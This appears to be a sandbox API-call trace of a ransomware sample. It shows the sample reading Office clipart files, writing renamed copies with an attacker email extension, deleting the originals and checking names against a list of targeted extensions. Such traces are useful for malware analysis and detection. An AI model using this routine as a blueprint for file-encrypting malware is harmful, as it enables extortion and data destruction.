	[0161.516] CloseHandle (hObject=0x1d8) returned 1
	[0161.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf")) returned 0x20
	[0161.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0161.516] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.516] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0161.517] GetLastError () returned 0x0
	[0161.517] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x13d4, lpOverlapped=0x0) returned 1
	[0161.524] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x13e0, lpOverlapped=0x0) returned 1
	[0161.525] ReadFile (in: hFile=0x1d8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.525] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.525] SetEndOfFile (hFile=0x25c) returned 1
	[0161.525] CloseHandle (hObject=0x25c) returned 1
	[0161.525] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.525] SetEndOfFile (hFile=0x1d8) returned 1
	[0161.527] CloseHandle (hObject=0x1d8) returned 1
	[0161.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf")) returned 1
	[0161.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.542] lstrlenW (lpString=".doc") returned 4
	[0161.542] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.542] lstrlenW (lpString=".docx") returned 5
	[0161.542] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.542] lstrlenW (lpString=".pdf") returned 4
	[0161.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.542] lstrlenW (lpString=".xls") returned 4
	[0161.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.542] lstrlenW (lpString=".xlsx") returned 5
	[0161.542] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.542] lstrlenW (lpString=".ppt") returned 4
	[0161.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.542] lstrlenW (lpString=".zip") returned 4
	[0161.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.542] lstrlenW (lpString=".rar") returned 4
	[0161.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.542] lstrlenW (lpString=".bz2") returned 4
	[0161.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.542] lstrlenW (lpString=".7z") returned 3
	[0161.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.542] lstrlenW (lpString=".dbf") returned 4
	[0161.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.543] lstrlenW (lpString=".1cd") returned 4
	[0161.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.543] lstrlenW (lpString=".jpg") returned 4
	[0161.543] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.543] lstrlenW (lpString=".doc") returned 4
	[0161.543] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString=".docx") returned 5
	[0161.543] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.543] lstrlenW (lpString=".pdf") returned 4
	[0161.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString=".xls") returned 4
	[0161.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.543] lstrlenW (lpString=".xlsx") returned 5
	[0161.543] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.543] lstrlenW (lpString=".ppt") returned 4
	[0161.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.543] lstrlenW (lpString=".zip") returned 4
	[0161.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.543] lstrlenW (lpString=".rar") returned 4
	[0161.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString=".bz2") returned 4
	[0161.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.543] lstrlenW (lpString=".7z") returned 3
	[0161.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.544] lstrlenW (lpString=".dbf") returned 4
	[0161.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.544] lstrlenW (lpString=".1cd") returned 4
	[0161.544] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF") returned 63
	[0161.544] lstrlenW (lpString=".jpg") returned 4
	[0161.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.544] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.544] lstrlenW (lpString="J0107358.WMF") returned 12
	[0161.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.549] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=7964) returned 1
	[0161.549] CloseHandle (hObject=0x388) returned 1
	[0161.549] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf")) returned 0x20
	[0161.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.550] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.550] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.551] GetLastError () returned 0x0
	[0161.551] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1f1c, lpOverlapped=0x0) returned 1
	[0161.552] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1f20, lpOverlapped=0x0) returned 1
	[0161.553] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.553] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.553] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.554] CloseHandle (hObject=0x3d0) returned 1
	[0161.554] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.554] SetEndOfFile (hFile=0x388) returned 1
	[0161.556] CloseHandle (hObject=0x388) returned 1
	[0161.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf")) returned 1
	[0161.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.558] lstrlenW (lpString=".doc") returned 4
	[0161.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.558] lstrlenW (lpString=".docx") returned 5
	[0161.558] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.558] lstrlenW (lpString=".pdf") returned 4
	[0161.558] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.558] lstrlenW (lpString=".xls") returned 4
	[0161.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.558] lstrlenW (lpString=".xlsx") returned 5
	[0161.559] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.559] lstrlenW (lpString=".ppt") returned 4
	[0161.559] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString=".zip") returned 4
	[0161.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.559] lstrlenW (lpString=".rar") returned 4
	[0161.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString=".bz2") returned 4
	[0161.559] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString=".7z") returned 3
	[0161.559] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString=".dbf") returned 4
	[0161.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString=".1cd") returned 4
	[0161.559] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString=".jpg") returned 4
	[0161.559] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.559] lstrlenW (lpString=".doc") returned 4
	[0161.559] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString=".docx") returned 5
	[0161.559] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.559] lstrlenW (lpString=".pdf") returned 4
	[0161.559] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.559] lstrlenW (lpString=".xls") returned 4
	[0161.560] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.560] lstrlenW (lpString=".xlsx") returned 5
	[0161.560] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.560] lstrlenW (lpString=".ppt") returned 4
	[0161.560] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.560] lstrlenW (lpString=".zip") returned 4
	[0161.560] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.560] lstrlenW (lpString=".rar") returned 4
	[0161.560] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.560] lstrlenW (lpString=".bz2") returned 4
	[0161.560] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.560] lstrlenW (lpString=".7z") returned 3
	[0161.560] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.560] lstrlenW (lpString=".dbf") returned 4
	[0161.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.560] lstrlenW (lpString=".1cd") returned 4
	[0161.560] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned 63
	[0161.560] lstrlenW (lpString=".jpg") returned 4
	[0161.560] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.560] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.560] lstrlenW (lpString="J0107364.WMF") returned 12
	[0161.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.561] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=16588) returned 1
	[0161.561] CloseHandle (hObject=0x388) returned 1
	[0161.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf")) returned 0x20
	[0161.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.562] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.562] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.562] GetLastError () returned 0x0
	[0161.562] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x40cc, lpOverlapped=0x0) returned 1
	[0161.564] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x40d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x40d0, lpOverlapped=0x0) returned 1
	[0161.565] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.565] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.565] SetEndOfFile (hFile=0x3d0) returned 1
	[0161.565] CloseHandle (hObject=0x3d0) returned 1
	[0161.565] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.566] SetEndOfFile (hFile=0x388) returned 1
	[0161.568] CloseHandle (hObject=0x388) returned 1
	[0161.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf")) returned 1
	[0161.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.569] lstrlenW (lpString=".doc") returned 4
	[0161.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString=".docx") returned 5
	[0161.569] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.569] lstrlenW (lpString=".pdf") returned 4
	[0161.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString=".xls") returned 4
	[0161.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.569] lstrlenW (lpString=".xlsx") returned 5
	[0161.569] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.569] lstrlenW (lpString=".ppt") returned 4
	[0161.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.569] lstrlenW (lpString=".zip") returned 4
	[0161.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.569] lstrlenW (lpString=".rar") returned 4
	[0161.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString=".bz2") returned 4
	[0161.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString=".7z") returned 3
	[0161.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.569] lstrlenW (lpString=".dbf") returned 4
	[0161.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString=".1cd") returned 4
	[0161.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString=".jpg") returned 4
	[0161.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString=".doc") returned 4
	[0161.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString=".docx") returned 5
	[0161.570] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.570] lstrlenW (lpString=".pdf") returned 4
	[0161.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString=".xls") returned 4
	[0161.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.570] lstrlenW (lpString=".xlsx") returned 5
	[0161.570] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.570] lstrlenW (lpString=".ppt") returned 4
	[0161.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString=".zip") returned 4
	[0161.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.570] lstrlenW (lpString=".rar") returned 4
	[0161.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString=".bz2") returned 4
	[0161.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.570] lstrlenW (lpString=".7z") returned 3
	[0161.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.570] lstrlenW (lpString=".dbf") returned 4
	[0161.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.571] lstrlenW (lpString=".1cd") returned 4
	[0161.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF") returned 63
	[0161.571] lstrlenW (lpString=".jpg") returned 4
	[0161.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.571] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.571] lstrlenW (lpString="J0107426.WMF") returned 12
	[0161.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.571] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=11492) returned 1
	[0161.571] CloseHandle (hObject=0x388) returned 1
	[0161.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf")) returned 0x20
